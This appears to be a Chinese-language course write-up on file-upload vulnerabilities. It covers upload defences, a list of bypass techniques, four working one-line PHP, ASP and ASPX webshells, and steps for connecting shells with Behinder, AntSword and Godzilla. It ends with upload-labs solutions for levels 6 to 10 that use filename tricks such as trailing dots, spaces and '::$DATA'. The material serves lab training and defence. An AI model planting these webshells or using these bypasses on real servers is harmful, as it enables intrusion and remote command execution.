目录
3. 课中所讲的三种webshell管理工具的使用方法(演示使用该工具连接webshell及抓取流量包进行分析特征)
1. 文件上传防御手段及绕过手段总结
文件上传防御手段
- 文件扩展名服务端白名单校验:
- 仅允许特定文件类型上传,如文档、图片、视频等,并维护一个白名单列表。
- 对上传文件的扩展名进行严格检查,确保它符合白名单中的要求。
- 文件内容服务端校验:
- 验证文件内容,确保文件类型与扩展名一致,防止通过修改文件扩展名绕过检查。
- 使用文件内容的前几个字节(文件头)进行类型判断,这种方法比单纯依赖扩展名更可靠。
- 上传文件重命名:
- 对上传的文件进行重命名,使用随机或唯一标识符作为文件名,防止攻击者通过文件名访问恶意文件。
- 隐藏上传文件路径:
- 将上传的文件存储在网站根目录之外的目录,防止攻击者通过URL路径直接访问这些文件。
- 文件上传的目录设置为不可执行:
- 确保存放上传文件的目录没有执行权限,防止上传的恶意脚本被执行。
- 使用文件上传限制:
- 设置文件大小限制和上传频率限制,防止恶意用户或自动化脚本滥用上传功能。
- 对上传的文件进行病毒扫描和内容检查,确保它们不包含恶意代码或敏感数据。
- 用户身份验证和授权:
- 要求用户进行身份验证和授权后才能上传文件,确保只有合法用户才能上传文件。
- 使用安全的文件上传库和框架:
- 利用成熟的文件上传库和框架,它们通常包含了许多内置的安全措施和最佳实践。
文件上传绕过手段
- 前端绕过:
- 删除或禁用前端校验函数,如JavaScript验证。
- 使用网络抓包工具(如Burp Suite)修改HTTP请求,包括文件后缀名等。
- 黑名单绕过:
- 利用等价扩展名绕过,如将.php文件重命名为.php5、.phtml等。
- 上传.htaccess文件,修改服务器配置,使特定类型的文件被当作PHP代码执行。
- 利用大小写绕过(仅Windows),如将.php文件重命名为.PhP。
- 利用空格、点号等特殊字符绕过,如file.php. 或file.php 。
- MIME类型绕过:
- 修改文件的MIME类型,使其看起来像是允许上传的文件类型。
- %00截断绕过:
- 在URL或POST请求中插入%00(ASCII码的0),使服务器在处理文件名时提前截断。
- 文件内容检测绕过:
- 在合法文件(如图片)中嵌入恶意代码,通过修改文件头或利用文件处理过程中的漏洞绕过检测。
- 利用服务器解析漏洞:
- 利用服务器对特定文件扩展名的解析漏洞,上传看似不合法的文件后缀,使其被当作PHP代码执行。
- 条件竞争时间差:
- 利用文件上传后服务器处理文件的时间差,在文件被删除之前访问并执行恶意文件。
2. 文件上传常用一句话木马
文件上传中的“一句话木马”通常指的是一种极其简洁且能快速植入系统以进行控制的恶意代码。这种“一句话”的形式往往隐藏在看似正常的文件中,如图片、文档等,通过特定的触发条件来执行恶意指令。使用或传播木马是非法和不道德的行为,并可能导致严重的法律后果。
php:1. <?php @eval($_POST['pass']);?>
2. <?php system($_GET['cmd']);?>
asp:<%eval request ("pass")%>
aspx:<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
3. 课中所讲的三种webshell管理工具的使用方法(演示使用该工具连接webshell及抓取流量包进行分析特征)
1.冰蝎
启动冰蝎:
点击传输协议:
选择default_xor_base64:
点击生成服务端:
将shell.php上传至web目录,然后进行添加:
URL为php文件的路径,传输协议与之前保持一致:
保存后双击即可进入:
2.蚁剑
启动!
添加数据:
将一句话木马放到web根目录下,测试连接:
点击添加,双击进入,成功:
3.Godzilla
启动哥斯拉(Godzilla):
点击管理-->生成,生成一个木马:
选择文件生成路径并设置文件名:
成功生成木马文件:
回到哥斯拉,“目标”->“添加”,填写里面的内容。要和这个木马生成时候选的的选项保持一致:
“测试连接”,看是否有出错,提示“success”了再“添加”:
选中目标,鼠标右键->“进入”,就可以看到内容了:
4. 文件上传无回显如何查找webshell地址
1. 利用网站日志
- Web服务器日志:检查Web服务器的访问日志和错误日志,特别是关注与文件上传功能相关的请求和响应。这些日志可能包含有关上传文件存储位置的线索。
- 应用程序日志:如果应用程序有详细的日志记录功能,检查这些日志以获取有关文件上传和处理的更多信息。
2. 源代码审查
- 分析应用程序代码:如果有权访问应用程序的源代码,审查与文件上传相关的代码部分。这通常涉及查找处理文件上传的脚本或函数,并查看它们如何将文件存储在服务器上。
- 搜索敏感路径:在源代码中搜索常见的Webshell存储路径,如
/uploads/
、/temp/
等,以及可能包含用户上传文件的数据库字段。
3. 文件系统搜索
- 使用命令行工具:如果可以通过SSH或类似方式访问服务器,可以使用命令行工具(如
find
、grep
等)在文件系统中搜索可疑文件。这包括搜索具有特定扩展名(如.php
、.asp
等)的文件,以及搜索包含恶意代码片段的文件。 - 文件属性检查:检查文件的创建时间、修改时间和访问时间,特别是那些与攻击时间相匹配的文件。
4. 使用Webshell扫描工具
- Webshell检测工具:利用专门的Webshell扫描工具(如D盾、河马等)对网站进行扫描。这些工具能够识别并报告常见的Webshell文件和恶意代码模式。
- 安全扫描服务:考虑使用专业的安全扫描服务,这些服务通常提供更全面的漏洞扫描和Webshell检测功能。
5. 监控网络流量
- 网络抓包:使用网络抓包工具(如Wireshark)监控网站的网络流量。分析上传请求和响应,特别是那些与文件上传相关的HTTP请求,以获取有关文件存储位置的线索。
- 代理服务器日志:如果网站使用代理服务器(如Nginx、Apache等),检查这些服务器的日志以获取有关文件上传和转发的更多信息。
5. upload-labs靶场通关第6-第10关
1.第六关
把.php 格式改为 .Php 上传上去之后,就会自动解析为.php
蚁剑链接:
2.第七关
使用空格绕过黑名单。抓包,修改上传一句话木马文件名7.phP
(注意这里有个空格)
放包之后用蚁剑连接:
3.第八关
这一关黑名单,没有使用deldot()过滤文件名末尾的点,可以使用文件名后加.进行绕过。抓包,修改上传一句话木马文件名8.php.
(注意这里有个点)
连接蚁剑:
4.第九关
上传PHP一句话文件,抓包改后缀9.php::$DATA:
用蚁剑连接:
5.第十关
上传10.php 然后用bp改后缀加点空格点
(即文件名为10.php. .
)
用蚁剑连接: